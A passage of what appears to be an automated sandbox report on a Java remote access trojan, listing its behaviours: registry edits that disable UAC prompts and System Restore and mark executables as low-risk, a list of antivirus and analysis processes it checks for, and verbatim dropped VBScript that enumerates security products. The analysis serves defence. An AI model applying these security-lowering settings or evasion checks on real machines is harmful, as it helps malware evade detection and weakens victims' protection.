2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi;2>
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DF03C0 cpuid 2_2_02DF03C0
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7388 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jartracer.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7564 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7620 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A93DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 6_2_73A93DFC
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\regedit.exe Registry value created: PromptOnSecureDesktop 0
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: C:\Windows\SysWOW64\regedit.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKService.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: acs.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: cscript.exe, 0000000B.00000003.1684085161.000000000333E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1684309240.0000000003342000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1684930666.0000000003343000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1683697790.0000000003359000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684820314.0000000003585000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000002.1685492246.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684796867.00000000035C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mbam.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: op_mon.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED

Remote Access Functionality

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED
Source: _0.337891030941391956323023258775833856.class.6.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: krmyqqmohp.txt.5.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A911B0 _Java_com_Title_disableListener@8, 6_2_73A911B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A91110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW, 6_2_73A91110